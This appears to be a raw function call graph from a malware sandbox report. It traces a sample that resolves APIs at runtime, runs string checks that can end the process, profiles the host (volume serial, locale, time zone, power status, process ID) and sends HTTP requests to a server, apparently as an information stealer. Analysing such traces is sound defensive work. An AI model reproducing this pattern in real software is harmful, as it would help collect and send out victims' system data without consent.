e145c0 2 API calls 14081->14082 14083 e13bfe 14082->14083 14084 e145c0 2 API calls 14083->14084 14085 e13c17 14084->14085 14086 e145c0 2 API calls 14085->14086 14087 e13c30 14086->14087 14088 e145c0 2 API calls 14087->14088 14089 e13c49 14088->14089 14090 e145c0 2 API calls 14089->14090 14091 e13c62 14090->14091 14092 e145c0 2 API calls 14091->14092 14093 e13c7b 14092->14093 14094 e145c0 2 API calls 14093->14094 14095 e13c94 14094->14095 14096 e145c0 2 API calls 14095->14096 14097 e13cad 14096->14097 14098 e145c0 2 API calls 14097->14098 14099 e13cc6 14098->14099 14100 e145c0 2 API calls 14099->14100 14101 e13cdf 14100->14101 14102 e145c0 2 API calls 14101->14102 14103 e13cf8 14102->14103 14104 e145c0 2 API calls 14103->14104 14105 e13d11 14104->14105 14106 e145c0 2 API calls 14105->14106 14107 e13d2a 14106->14107 14108 e145c0 2 API calls 14107->14108 14109 e13d43 14108->14109 14110 e145c0 2 API calls 14109->14110 14111 e13d5c 14110->14111 14112 e145c0 2 API calls 14111->14112 14113 e13d75 14112->14113 14114 e145c0 2 API calls 14113->14114 14115 e13d8e 14114->14115 14116 e145c0 2 API calls 14115->14116 14117 e13da7 14116->14117 14118 e145c0 2 API calls 14117->14118 14119 e13dc0 14118->14119 14120 e145c0 2 API calls 14119->14120 14121 e13dd9 14120->14121 14122 e145c0 2 API calls 14121->14122 14123 e13df2 14122->14123 14124 e145c0 2 API calls 14123->14124 14125 e13e0b 14124->14125 14126 e145c0 2 API calls 14125->14126 14127 e13e24 14126->14127 14128 e145c0 2 API calls 14127->14128 14129 e13e3d 14128->14129 14130 e145c0 2 API calls 14129->14130 14131 e13e56 14130->14131 14132 e145c0 2 API calls 14131->14132 14133 e13e6f 14132->14133 14134 e145c0 2 API calls 14133->14134 14135 e13e88 14134->14135 14136 e145c0 2 API calls 14135->14136 14137 e13ea1 14136->14137 14138 e145c0 2 API calls 14137->14138 14139 e13eba 14138->14139 14140 e145c0 2 API calls 14139->14140 14141 e13ed3 14140->14141 14142 e145c0 2 API calls 14141->14142 14143 e13eec 14142->14143 14144 e145c0 2 API calls 14143->14144 14145 e13f05 14144->14145 14146 e145c0 2 API calls 14145->14146 14147 e13f1e 14146->14147 14148 e145c0 2 API calls 14147->14148 14149 e13f37 14148->14149 14150 e145c0 2 API calls 14149->14150 14151 e13f50 14150->14151 14152 e145c0 2 API calls 14151->14152 14153 e13f69 14152->14153 14154 e145c0 2 API calls 14153->14154 14155 e13f82 14154->14155 14156 e145c0 2 API calls 14155->14156 14157 e13f9b 14156->14157 14158 e145c0 2 API calls 14157->14158 14159 e13fb4 14158->14159 14160 e145c0 2 API calls 14159->14160 14161 e13fcd 14160->14161 14162 e145c0 2 API calls 14161->14162 14163 e13fe6 14162->14163 14164 e145c0 2 API calls 14163->14164 14165 e13fff 14164->14165 14166 e145c0 2 API calls 14165->14166 14167 e14018 14166->14167 14168 e145c0 2 API calls 14167->14168 14169 e14031 14168->14169 14170 e145c0 2 API calls 14169->14170 14171 e1404a 14170->14171 14172 e145c0 2 API calls 14171->14172 14173 e14063 14172->14173 14174 e145c0 2 API calls 14173->14174 14175 e1407c 14174->14175 14176 e145c0 2 API calls 14175->14176 14177 e14095 14176->14177 14178 e145c0 2 API calls 14177->14178 14179 e140ae 14178->14179 14180 e145c0 2 API calls 14179->14180 14181 e140c7 14180->14181 14182 e145c0 2 API calls 14181->14182 14183 e140e0 14182->14183 14184 e145c0 2 API calls 14183->14184 14185 e140f9 14184->14185 14186 e145c0 2 API calls 14185->14186 14187 e14112 14186->14187 14188 e145c0 2 API calls 14187->14188 14189 e1412b 14188->14189 14190 e145c0 2 API calls 14189->14190 14191 e14144 14190->14191 14192 e145c0 2 API calls 14191->14192 14193 e1415d 14192->14193 14194 e145c0 2 API calls 14193->14194 14195 e14176 14194->14195 14196 e145c0 2 API calls 14195->14196 14197 e1418f 14196->14197 14198 e145c0 2 API calls 14197->14198 14199 e141a8 14198->14199 14200 e145c0 2 API calls 14199->14200 14201 e141c1 14200->14201 14202 e145c0 2 API calls 14201->14202 14203 e141da 14202->14203 14204 e145c0 2 API calls 14203->14204 14205 e141f3 14204->14205 14206 e145c0 2 API calls 14205->14206 14207 e1420c 14206->14207 14208 e145c0 2 API calls 14207->14208 14209 e14225 14208->14209 14210 e145c0 2 API calls 14209->14210 14211 e1423e 14210->14211 14212 e145c0 2 API calls 14211->14212 14213 e14257 14212->14213 14214 e145c0 2 API calls 14213->14214 14215 e14270 14214->14215 14216 e145c0 2 API calls 14215->14216 14217 e14289 14216->14217 14218 e145c0 2 API calls 14217->14218 14219 e142a2 14218->14219 14220 e145c0 2 API calls 14219->14220 14221 e142bb 14220->14221 14222 e145c0 2 API calls 14221->14222 14223 e142d4 14222->14223 14224 e145c0 2 API calls 14223->14224 14225 e142ed 14224->14225 14226 e145c0 2 API calls 14225->14226 14227 e14306 14226->14227 14228 e145c0 2 API calls 14227->14228 14229 e1431f 14228->14229 14230 e145c0 2 API calls 14229->14230 14231 e14338 14230->14231 14232 e145c0 2 API calls 14231->14232 14233 e14351 14232->14233 14234 e145c0 2 API calls 14233->14234 14235 e1436a 14234->14235 14236 e145c0 2 API calls 14235->14236 14237 e14383 14236->14237 14238 e145c0 2 API calls 14237->14238 14239 e1439c 14238->14239 14240 e145c0 2 API calls 14239->14240 14241 e143b5 14240->14241 14242 e145c0 2 API calls 14241->14242 14243 e143ce 14242->14243 14244 e145c0 2 API calls 14243->14244 14245 e143e7 14244->14245 14246 e145c0 2 API calls 14245->14246 14247 e14400 14246->14247 14248 e145c0 2 API calls 14247->14248 14249 e14419 14248->14249 14250 e145c0 2 API calls 14249->14250 14251 e14432 14250->14251 14252 e145c0 2 API calls 14251->14252 14253 e1444b 14252->14253 14254 e145c0 2 API calls 14253->14254 14255 e14464 14254->14255 14256 e145c0 2 API calls 14255->14256 14257 e1447d 14256->14257 14258 e145c0 2 API calls 14257->14258 14259 e14496 14258->14259 14260 e145c0 2 API calls 14259->14260 14261 e144af 14260->14261 14262 e145c0 2 API calls 14261->14262 14263 e144c8 14262->14263 14264 e145c0 2 API calls 14263->14264 14265 e144e1 14264->14265 14266 e145c0 2 API calls 14265->14266 14267 e144fa 14266->14267 14268 e145c0 2 API calls 14267->14268 14269 e14513 14268->14269 14270 e145c0 2 API calls 14269->14270 14271 e1452c 14270->14271 14272 e145c0 2 API calls 14271->14272 14273 e14545 14272->14273 14274 e145c0 2 API calls 14273->14274 14275 e1455e 14274->14275 14276 e145c0 2 API calls 14275->14276 14277 e14577 14276->14277 14278 e145c0 2 API calls 14277->14278 14279 e14590 14278->14279 14280 e145c0 2 API calls 14279->14280 14281 e145a9 14280->14281 14282 e29c10 14281->14282 14283 e29c20 43 API calls 14282->14283 14284 e2a036 8 API calls 14282->14284 14283->14284 14285 e2a146 14284->14285 14286 e2a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14284->14286 14287 e2a153 8 API calls 14285->14287 14288 e2a216 14285->14288 14286->14285 14287->14288 14289 e2a298 14288->14289 14290 e2a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14288->14290 14291 e2a337 14289->14291 14292 e2a2a5 6 API calls 14289->14292 14290->14289 14293 e2a344 9 API calls 14291->14293 14294 e2a41f 14291->14294 14292->14291 14293->14294 14295 e2a4a2 14294->14295 14296 e2a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14294->14296 14297 e2a4ab GetProcAddress GetProcAddress 14295->14297 14298 e2a4dc 14295->14298 14296->14295 14297->14298 14299 e2a515 14298->14299 14300 e2a4e5 GetProcAddress GetProcAddress 14298->14300 14301 e2a612 14299->14301 14302 e2a522 10 API calls 14299->14302 14300->14299 14303 e2a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14301->14303 14304 e2a67d 14301->14304 14302->14301 14303->14304 14305 e2a686 GetProcAddress 14304->14305 14306 e2a69e 14304->14306 14305->14306 14307 e2a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14306->14307 14308 e25ca3 14306->14308 14307->14308 14309 e11590 14308->14309 15430 e11670 14309->15430 14312 e2a7a0 lstrcpy 14313 e115b5 14312->14313 14314 e2a7a0 lstrcpy 14313->14314 14315 e115c7 14314->14315 14316 e2a7a0 lstrcpy 14315->14316 14317 e115d9 14316->14317 14318 e2a7a0 lstrcpy 14317->14318 14319 e11663 14318->14319 14320 e25510 14319->14320 14321 e25521 14320->14321 14322 e2a820 2 API calls 14321->14322 14323 e2552e 14322->14323 14324 e2a820 2 API calls 14323->14324 14325 e2553b 14324->14325 14326 e2a820 2 API calls 14325->14326 14327 e25548 14326->14327 14328 e2a740 lstrcpy 14327->14328 14329 e25555 14328->14329 14330 e2a740 lstrcpy 14329->14330 14331 e25562 14330->14331 14332 e2a740 lstrcpy 14331->14332 14333 e2556f 14332->14333 14334 e2a740 lstrcpy 14333->14334 14346 e2557c 14334->14346 14335 e2a8a0 lstrcpy 14335->14346 14336 e25643 StrCmpCA 14336->14346 14337 e256a0 StrCmpCA 14338 e257dc 14337->14338 14337->14346 14340 e2a8a0 lstrcpy 14338->14340 14339 e2a7a0 lstrcpy 14339->14346 14341 e257e8 14340->14341 14342 e2a820 2 API calls 14341->14342 14344 e257f6 14342->14344 14343 e251f0 20 API calls 14343->14346 14347 e2a820 2 API calls 14344->14347 14345 e25856 StrCmpCA 14345->14346 14348 e25991 14345->14348 14346->14335 14346->14336 14346->14337 14346->14339 14346->14343 14346->14345 14351 e11590 lstrcpy 14346->14351 14355 e2a740 lstrcpy 14346->14355 14356 e2a820 lstrlen lstrcpy 14346->14356 14357 e252c0 25 API calls 14346->14357 14359 e25a0b StrCmpCA 14346->14359 14371 e2578a StrCmpCA 14346->14371 14373 e2593f StrCmpCA 14346->14373 14350 e25805 14347->14350 14349 e2a8a0 lstrcpy 14348->14349 14352 e2599d 14349->14352 14353 e11670 lstrcpy 14350->14353 14351->14346 14354 e2a820 2 API calls 14352->14354 14374 e25811 14353->14374 14358 e259ab 14354->14358 14355->14346 14356->14346 14357->14346 14360 e2a820 2 API calls 14358->14360 14361 e25a16 Sleep 14359->14361 14362 e25a28 14359->14362 14363 e259ba 14360->14363 14361->14346 14364 e2a8a0 lstrcpy 14362->14364 14366 e11670 lstrcpy 14363->14366 14365 e25a34 14364->14365 14367 e2a820 2 API calls 14365->14367 14366->14374 14368 e25a43 14367->14368 14369 e2a820 2 API calls 14368->14369 14370 e25a52 14369->14370 14372 e11670 lstrcpy 14370->14372 14371->14346 14372->14374 14373->14346 14374->13427 14376 e27553 GetVolumeInformationA 14375->14376 14377 e2754c 14375->14377 14379 e27591 14376->14379 14377->14376 14378 e275fc GetProcessHeap RtlAllocateHeap 14380 e27628 wsprintfA 14378->14380 14381 e27619 14378->14381 14379->14378 14383 e2a740 lstrcpy 14380->14383 14382 e2a740 lstrcpy 14381->14382 14384 e25da7 14382->14384 14383->14384 14384->13448 14386 e2a7a0 lstrcpy 14385->14386 14387 e14899 14386->14387 15439 e147b0 14387->15439 14389 e148a5 14390 e2a740 lstrcpy 14389->14390 14391 e148d7 14390->14391 14392 e2a740 lstrcpy 14391->14392 14393 e148e4 14392->14393 14394 e2a740 lstrcpy 14393->14394 14395 e148f1 14394->14395 14396 e2a740 lstrcpy 14395->14396 14397 e148fe 14396->14397 14398 e2a740 lstrcpy 14397->14398 14399 e1490b InternetOpenA StrCmpCA 14398->14399 14400 e14944 14399->14400 14401 e14ecb InternetCloseHandle 14400->14401 15445 e28b60 14400->15445 14402 e14ee8 14401->14402 15460 e19ac0 CryptStringToBinaryA 14402->15460 14404 e14963 15453 e2a920 14404->15453 14407 e14976 14409 e2a8a0 lstrcpy 14407->14409 14414 e1497f 14409->14414 14410 e2a820 2 API calls 14411 e14f05 14410->14411 14413 e2a9b0 4 API calls 14411->14413 14412 e14f27 codecvt 14416 e2a7a0 lstrcpy 14412->14416 14415 e14f1b 14413->14415 14418 e2a9b0 4 API calls 14414->14418 14417 e2a8a0 lstrcpy 14415->14417 14429 e14f57 14416->14429 14417->14412 14419 e149a9 14418->14419 14420 e2a8a0 lstrcpy 14419->14420 14421 e149b2 14420->14421 14422 e2a9b0 4 API calls 14421->14422 14423 e149d1 14422->14423 14424 e2a8a0 lstrcpy 14423->14424 14425 e149da 14424->14425 14426 e2a920 3 API calls 14425->14426 14427 e149f8 14426->14427 14428 e2a8a0 lstrcpy 14427->14428 14430 e14a01 14428->14430 14429->13451 14431 e2a9b0 4 API calls 14430->14431 14432 e14a20 14431->14432 14433 e2a8a0 lstrcpy 14432->14433 14434 e14a29 14433->14434 14435 e2a9b0 4 API calls 14434->14435 14436 e14a48 14435->14436 14437 e2a8a0 lstrcpy 14436->14437 14438 e14a51 14437->14438 14439 e2a9b0 4 API calls 14438->14439 14440 e14a7d 14439->14440 14441 e2a920 3 API calls 14440->14441 14442 e14a84 14441->14442 14443 e2a8a0 lstrcpy 14442->14443 14444 e14a8d 14443->14444 14445 e14aa3 InternetConnectA 14444->14445 14445->14401 14446 e14ad3 HttpOpenRequestA 14445->14446 14448 e14b28 14446->14448 14449 e14ebe InternetCloseHandle 14446->14449 14450 e2a9b0 4 API calls 14448->14450 14449->14401 14451 e14b3c 14450->14451 14452 e2a8a0 lstrcpy 14451->14452 14453 e14b45 14452->14453 14454 e2a920 3 API calls 14453->14454 14455 e14b63 14454->14455 14456 e2a8a0 lstrcpy 14455->14456 14457 e14b6c 14456->14457 14458 e2a9b0 4 API calls 14457->14458 14459 e14b8b 14458->14459 14460 e2a8a0 lstrcpy 14459->14460 14461 e14b94 14460->14461 14462 e2a9b0 4 API calls 14461->14462 14463 e14bb5 14462->14463 14464 e2a8a0 lstrcpy 14463->14464 14465 e14bbe 14464->14465 14466 e2a9b0 4 API calls 14465->14466 14467 e14bde 14466->14467 14468 e2a8a0 lstrcpy 14467->14468 14469 e14be7 14468->14469 14470 e2a9b0 4 API calls 14469->14470 14471 e14c06 14470->14471 14472 e2a8a0 lstrcpy 14471->14472 14473 e14c0f 14472->14473 14474 e2a920 3 API calls 14473->14474 14475 e14c2d 14474->14475 14476 e2a8a0 lstrcpy 14475->14476 14477 e14c36 14476->14477 14478 e2a9b0 4 API calls 14477->14478 14479 e14c55 14478->14479 14480 e2a8a0 lstrcpy 14479->14480 14481 e14c5e 14480->14481 14482 e2a9b0 4 API calls 14481->14482 14483 e14c7d 14482->14483 14484 e2a8a0 lstrcpy 14483->14484 14485 e14c86 14484->14485 14486 e2a920 3 API calls 14485->14486 14487 e14ca4 14486->14487 14488 e2a8a0 lstrcpy 14487->14488 14489 e14cad 14488->14489 14490 e2a9b0 4 API calls 14489->14490 14491 e14ccc 14490->14491 14492 e2a8a0 lstrcpy 14491->14492 14493 e14cd5 14492->14493 14494 e2a9b0 4 API calls 14493->14494 14495 e14cf6 14494->14495 14496 e2a8a0 lstrcpy 14495->14496 14497 e14cff 14496->14497 14498 e2a9b0 4 API calls 14497->14498 14499 e14d1f 14498->14499 14500 e2a8a0 lstrcpy 14499->14500 14501 e14d28 14500->14501 14502 e2a9b0 4 API calls 14501->14502 14503 e14d47 14502->14503 14504 e2a8a0 lstrcpy 14503->14504 14505 e14d50 14504->14505 14506 e2a920 3 API calls 14505->14506 14507 e14d6e 14506->14507 14508 e2a8a0 lstrcpy 14507->14508 14509 e14d77 14508->14509 14510 e2a740 lstrcpy 14509->14510 14511 e14d92 14510->14511 14512 e2a920 3 API calls 14511->14512 14513 e14db3 14512->14513 14514 e2a920 3 API calls 14513->14514 14515 e14dba 14514->14515 14516 e2a8a0 lstrcpy 14515->14516 14517 e14dc6 14516->14517 14518 e14de7 lstrlen 14517->14518 14519 e14dfa 14518->14519 14520 e14e03 lstrlen 14519->14520 15459 e2aad0 14520->15459 14522 e14e13 HttpSendRequestA 14523 e14e32 InternetReadFile 14522->14523 14524 e14e67 InternetCloseHandle 14523->14524 14529 e14e5e 14523->14529 14527 e2a800 14524->14527 14526 e2a9b0 4 API calls 14526->14529 14527->14449 14528 e2a8a0 lstrcpy 14528->14529 14529->14523 14529->14524 14529->14526 14529->14528 15466 e2aad0 14530->15466 14532 e217c4 StrCmpCA 14533 e217d7 14532->14533 14534 e217cf ExitProcess 14532->14534 14535 e219c2 14533->14535 14536 e218cf StrCmpCA 14533->14536 14537 e218ad StrCmpCA 14533->14537 14538 e21932 StrCmpCA 14533->14538 14539 e21913 StrCmpCA 14533->14539 14540 e21970 StrCmpCA 14533->14540 14541 e218f1 StrCmpCA 14533->14541 14542 e21951 StrCmpCA 14533->14542 14543 e2187f StrCmpCA 14533->14543 14544 e2185d StrCmpCA 14533->14544 14545 e2a820 lstrlen lstrcpy 14533->14545 14535->13453 14536->14533 14537->14533 14538->14533 14539->14533 14540->14533 14541->14533 14542->14533 14543->14533 14544->14533 14545->14533 14547 e2a7a0 lstrcpy 14546->14547 14548 e15979 14547->14548 14549 e147b0 2 API calls 14548->14549 14550 e15985 14549->14550 14551 e2a740 lstrcpy 14550->14551 14552 e159ba 14551->14552 14553 e2a740 lstrcpy 14552->14553 14554 e159c7 14553->14554 14555 e2a740 lstrcpy 14554->14555 14556 e159d4 14555->14556 14557 e2a740 lstrcpy 14556->14557 14558 e159e1 14557->14558 14559 e2a740 lstrcpy 14558->14559 14560 e159ee InternetOpenA StrCmpCA 14559->14560 14561 e15a1d 14560->14561 14562 e15fc3 InternetCloseHandle 14561->14562 14563 e28b60 3 API calls 14561->14563 14564 e15fe0 14562->14564 14565 e15a3c 14563->14565 14567 e19ac0 4 API calls 14564->14567 14566 e2a920 3 API calls 14565->14566 14568 e15a4f 14566->14568 14569 e15fe6 14567->14569 14570 e2a8a0 lstrcpy 14568->14570 14571 e2a820 2 API calls 14569->14571 14574 e1601f codecvt 14569->14574 14575 e15a58 14570->14575 14572 e15ffd 14571->14572 14573 e2a9b0 4 API calls 14572->14573 14576 e16013 14573->14576 14578 e2a7a0 lstrcpy 14574->14578 14579 e2a9b0 4 API calls 14575->14579 14577 e2a8a0 lstrcpy 14576->14577 14577->14574 14587 e1604f 14578->14587 14580 e15a82 14579->14580 14581 e2a8a0 lstrcpy 14580->14581 14582 e15a8b 14581->14582 14583 e2a9b0 4 API calls 14582->14583 14584 e15aaa 14583->14584 14585 e2a8a0 lstrcpy 14584->14585 14586 e15ab3 14585->14586 14588 e2a920 3 API calls 14586->14588 14587->13459 14589 e15ad1 14588->14589 14590 e2a8a0 lstrcpy 14589->14590 14591 e15ada 14590->14591 14592 e2a9b0 4 API calls 14591->14592 14593 e15af9 14592->14593 14594 e2a8a0 lstrcpy 14593->14594 14595 e15b02 14594->14595 14596 e2a9b0 4 API calls 14595->14596 14597 e15b21 14596->14597 14598 e2a8a0 lstrcpy 14597->14598 14599 e15b2a 14598->14599 14600 e2a9b0 4 API calls 14599->14600 14601 e15b56 14600->14601 14602 e2a920 3 API calls 14601->14602 14603 e15b5d 14602->14603 14604 e2a8a0 lstrcpy 14603->14604 14605 e15b66 14604->14605 14606 e15b7c InternetConnectA 14605->14606 14606->14562 14607 e15bac HttpOpenRequestA 14606->14607 14609 e15fb6 InternetCloseHandle 14607->14609 14610 e15c0b 14607->14610 14609->14562 14611 e2a9b0 4 API calls 14610->14611 14612 e15c1f 14611->14612 14613 e2a8a0 lstrcpy 14612->14613 14614 e15c28 14613->14614 14615 e2a920 3 API calls 14614->14615 14616 e15c46 14615->14616 14617 e2a8a0 lstrcpy 14616->14617 14618 e15c4f 14617->14618 14619 e2a9b0 4 API calls 14618->14619 14620 e15c6e 14619->14620 14621 e2a8a0 lstrcpy 14620->14621 14622 e15c77 14621->14622 14623 e2a9b0 4 API calls 14622->14623 14624 e15c98 14623->14624 14625 e2a8a0 lstrcpy 14624->14625 14626 e15ca1 14625->14626 14627 e2a9b0 4 API calls 14626->14627 14628 e15cc1 14627->14628 14629 e2a8a0 lstrcpy 14628->14629 14630 e15cca 14629->14630 14631 e2a9b0 4 API calls 14630->14631 14632 e15ce9 14631->14632 14633 e2a8a0 lstrcpy 14632->14633 14634 e15cf2 14633->14634 14635 e2a920 3 API calls 14634->14635 14636 e15d10 14635->14636 14637 e2a8a0 lstrcpy 14636->14637 14638 e15d19 14637->14638 14639 e2a9b0 4 API calls 14638->14639 14640 e15d38 14639->14640 14641 e2a8a0 lstrcpy 14640->14641 14642 e15d41 14641->14642 14643 e2a9b0 4 API calls 14642->14643 14644 e15d60 14643->14644 14645 e2a8a0 lstrcpy 14644->14645 14646 e15d69 14645->14646 14647 e2a920 3 API calls 14646->14647 14648 e15d87 14647->14648 14649 e2a8a0 lstrcpy 14648->14649 14650 e15d90 14649->14650 14651 e2a9b0 4 API calls 14650->14651 14652 e15daf 14651->14652 14653 e2a8a0 lstrcpy 14652->14653 14654 e15db8 14653->14654 14655 e2a9b0 4 API calls 14654->14655 14656 e15dd9 14655->14656 14657 e2a8a0 lstrcpy 14656->14657 14658 e15de2 14657->14658 14659 e2a9b0 4 API calls 14658->14659 14660 e15e02 14659->14660 14661 e2a8a0 lstrcpy 14660->14661 14662 e15e0b 14661->14662 14663 e2a9b0 4 API calls 14662->14663 14664 e15e2a 14663->14664 14665 e2a8a0 lstrcpy 14664->14665 14666 e15e33 14665->14666 14667 e2a920 3 API calls 14666->14667 14668 e15e54 14667->14668 14669 e2a8a0 lstrcpy 14668->14669 14670 e15e5d 14669->14670 14671 e15e70 lstrlen 14670->14671 15467 e2aad0 14671->15467 14673 e15e81 lstrlen GetProcessHeap RtlAllocateHeap 15468 e2aad0 14673->15468 14675 e15eae lstrlen 14676 e15ebe 14675->14676 14677 e15ed7 lstrlen 14676->14677 14678 e15ee7 14677->14678 14679 e15ef0 lstrlen 14678->14679 14680 e15f04 14679->14680 14681 e15f1a lstrlen 14680->14681 15469 e2aad0 14681->15469 14683 e15f2a HttpSendRequestA 14684 e15f35 InternetReadFile 14683->14684 14685 e15f6a InternetCloseHandle 14684->14685 14689 e15f61 14684->14689 14685->14609 14687 e2a9b0 4 API calls 14687->14689 14688 e2a8a0 lstrcpy 14688->14689 14689->14684 14689->14685 14689->14687 14689->14688 14692 e21077 14690->14692 14691 e21151 14691->13461 14692->14691 14693 e2a820 lstrlen lstrcpy 14692->14693 14693->14692 14695 e20db7 14694->14695 14696 e20f17 14695->14696 14697 e20e27 StrCmpCA 14695->14697 14698 e20e67 StrCmpCA 14695->14698 14699 e20ea4 StrCmpCA 14695->14699 14700 e2a820 lstrlen lstrcpy 14695->14700 14696->13469 14697->14695 14698->14695 14699->14695 14700->14695 14702 e20f67 14701->14702 14703 e21044 14702->14703 14704 e20fb2 StrCmpCA 14702->14704 14705 e2a820 lstrlen lstrcpy 14702->14705 14703->13477 14704->14702 14705->14702 14707 e2a740 lstrcpy 14706->14707 14708 e21a26 14707->14708 14709 e2a9b0 4 API calls 14708->14709 14710 e21a37 14709->14710 14711 e2a8a0 lstrcpy 14710->14711 14712 e21a40 14711->14712 14713 e2a9b0 4 API calls 14712->14713 14714 e21a5b 14713->14714 14715 e2a8a0 lstrcpy 14714->14715 14716 e21a64 14715->14716 14717 e2a9b0 4 API calls 14716->14717 14718 e21a7d 14717->14718 14719 e2a8a0 lstrcpy 14718->14719 14720 e21a86 14719->14720 14721 e2a9b0 4 API calls 14720->14721 14722 e21aa1 14721->14722 14723 e2a8a0 lstrcpy 14722->14723 14724 e21aaa 14723->14724 14725 e2a9b0 4 API calls 14724->14725 14726 e21ac3 14725->14726 14727 e2a8a0 lstrcpy 14726->14727 14728 e21acc 14727->14728 14729 e2a9b0 4 API calls 14728->14729 14730 e21ae7 14729->14730 14731 e2a8a0 lstrcpy 14730->14731 14732 e21af0 14731->14732 14733 e2a9b0 4 API calls 14732->14733 14734 e21b09 14733->14734 14735 e2a8a0 lstrcpy 14734->14735 14736 e21b12 14735->14736 14737 e2a9b0 4 API calls 14736->14737 14738 e21b2d 14737->14738 14739 e2a8a0 lstrcpy 14738->14739 14740 e21b36 14739->14740 14741 e2a9b0 4 API calls 14740->14741 14742 e21b4f 14741->14742 14743 e2a8a0 lstrcpy 14742->14743 14744 e21b58 14743->14744 14745 e2a9b0 4 API calls 14744->14745 14746 e21b76 14745->14746 14747 e2a8a0 lstrcpy 14746->14747 14748 e21b7f 14747->14748 14749 e27500 6 API calls 14748->14749 14750 e21b96 14749->14750 14751 e2a920 3 API calls 14750->14751 14752 e21ba9 14751->14752 14753 e2a8a0 lstrcpy 14752->14753 14754 e21bb2 14753->14754 14755 e2a9b0 4 API calls 14754->14755 14756 e21bdc 14755->14756 14757 e2a8a0 lstrcpy 14756->14757 14758 e21be5 14757->14758 14759 e2a9b0 4 API calls 14758->14759 14760 e21c05 14759->14760 14761 e2a8a0 lstrcpy 14760->14761 14762 e21c0e 14761->14762 15470 e27690 GetProcessHeap RtlAllocateHeap 14762->15470 14765 e2a9b0 4 API calls 14766 e21c2e 14765->14766 14767 e2a8a0 lstrcpy 14766->14767 14768 e21c37 14767->14768 14769 e2a9b0 4 API calls 14768->14769 14770 e21c56 14769->14770 14771 e2a8a0 lstrcpy 14770->14771 14772 e21c5f 14771->14772 14773 e2a9b0 4 API calls 14772->14773 14774 e21c80 14773->14774 14775 e2a8a0 lstrcpy 14774->14775 14776 e21c89 14775->14776 15477 e277c0 GetCurrentProcess IsWow64Process 14776->15477 14779 e2a9b0 4 API calls 14780 e21ca9 14779->14780 14781 e2a8a0 lstrcpy 14780->14781 14782 e21cb2 14781->14782 14783 e2a9b0 4 API calls 14782->14783 14784 e21cd1 14783->14784 14785 e2a8a0 lstrcpy 14784->14785 14786 e21cda 14785->14786 14787 e2a9b0 4 API calls 14786->14787 14788 e21cfb 14787->14788 14789 e2a8a0 lstrcpy 14788->14789 14790 e21d04 14789->14790 14791 e27850 3 API calls 14790->14791 14792 e21d14 14791->14792 14793 e2a9b0 4 API calls 14792->14793 14794 e21d24 14793->14794 14795 e2a8a0 lstrcpy 14794->14795 14796 e21d2d 14795->14796 14797 e2a9b0 4 API calls 14796->14797 14798 e21d4c 14797->14798 14799 e2a8a0 lstrcpy 14798->14799 14800 e21d55 14799->14800 14801 e2a9b0 4 API calls 14800->14801 14802 e21d75 14801->14802 14803 e2a8a0 lstrcpy 14802->14803 14804 e21d7e 14803->14804 14805 e278e0 3 API calls 14804->14805 14806 e21d8e 14805->14806 14807 e2a9b0 4 API calls 14806->14807 14808 e21d9e 14807->14808 14809 e2a8a0 lstrcpy 14808->14809 14810 e21da7 14809->14810 14811 e2a9b0 4 API calls 14810->14811 14812 e21dc6 14811->14812 14813 e2a8a0 lstrcpy 14812->14813 14814 e21dcf 14813->14814 14815 e2a9b0 4 API calls 14814->14815 14816 e21df0 14815->14816 14817 e2a8a0 lstrcpy 14816->14817 14818 e21df9 14817->14818 15479 e27980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14818->15479 14821 e2a9b0 4 API calls 14822 e21e19 14821->14822 14823 e2a8a0 lstrcpy 14822->14823 14824 e21e22 14823->14824 14825 e2a9b0 4 API calls 14824->14825 14826 e21e41 14825->14826 14827 e2a8a0 lstrcpy 14826->14827 14828 e21e4a 14827->14828 14829 e2a9b0 4 API calls 14828->14829 14830 e21e6b 14829->14830 14831 e2a8a0 lstrcpy 14830->14831 14832 e21e74 14831->14832 15481 e27a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14832->15481 14835 e2a9b0 4 API calls 14836 e21e94 14835->14836 14837 e2a8a0 lstrcpy 14836->14837 14838 e21e9d 14837->14838 14839 e2a9b0 4 API calls 14838->14839 14840 e21ebc 14839->14840 14841 e2a8a0 lstrcpy 14840->14841 14842 e21ec5 14841->14842 14843 e2a9b0 4 API calls 14842->14843 14844 e21ee5 14843->14844 14845 e2a8a0 lstrcpy 14844->14845 14846 e21eee 14845->14846 15484 e27b00 GetUserDefaultLocaleName 14846->15484 14849 e2a9b0 4 API calls 14850 e21f0e 14849->14850 14851 e2a8a0 lstrcpy 14850->14851 14852 e21f17 14851->14852 14853 e2a9b0 4 API calls 14852->14853 14854 e21f36 14853->14854 14855 e2a8a0 lstrcpy 14854->14855 14856 e21f3f 14855->14856 14857 e2a9b0 4 API calls 14856->14857 14858 e21f60 14857->14858 14859 e2a8a0 lstrcpy 14858->14859 14860 e21f69 14859->14860 15488 e27b90 14860->15488 14862 e21f80 14863 e2a920 3 API calls 14862->14863 14864 e21f93 14863->14864 14865 e2a8a0 lstrcpy 14864->14865 14866 e21f9c 14865->14866 14867 e2a9b0 4 API calls 14866->14867 14868 e21fc6 14867->14868 14869 e2a8a0 lstrcpy 14868->14869 14870 e21fcf 14869->14870 14871 e2a9b0 4 API calls 14870->14871 14872 e21fef 14871->14872 14873 e2a8a0 lstrcpy 14872->14873 14874 e21ff8 14873->14874 15500 e27d80 GetSystemPowerStatus 14874->15500 14877 e2a9b0 4 API calls 14878 e22018 14877->14878 14879 e2a8a0 lstrcpy 14878->14879 14880 e22021 14879->14880 14881 e2a9b0 4 API calls 14880->14881 14882 e22040 14881->14882 14883 e2a8a0 lstrcpy 14882->14883 14884 e22049 14883->14884 14885 e2a9b0 4 API calls 14884->14885 14886 e2206a 14885->14886 14887 e2a8a0 lstrcpy 14886->14887 14888 e22073 14887->14888 14889 e2207e GetCurrentProcessId 14888->14889 15502 e29470 OpenProcess 14889->15502 14892 e2a920 3 API calls 14893 e220a4 14892->14893 14894 e2a8a0 lstrcpy 14893->14894 14895 e220ad 14894->14895 14896 e2a9b0 4 API calls 14895->14896 14897 e220d7 14896->14897 14898 e2a8a0 lstrcpy 14897->14898 14899 e220e0 14898->14899 14900 e2a9b0 4 API calls 14899->14900 14901 e22100 14900->14901 14902 e2a8a0 lstrcpy 14901->14902 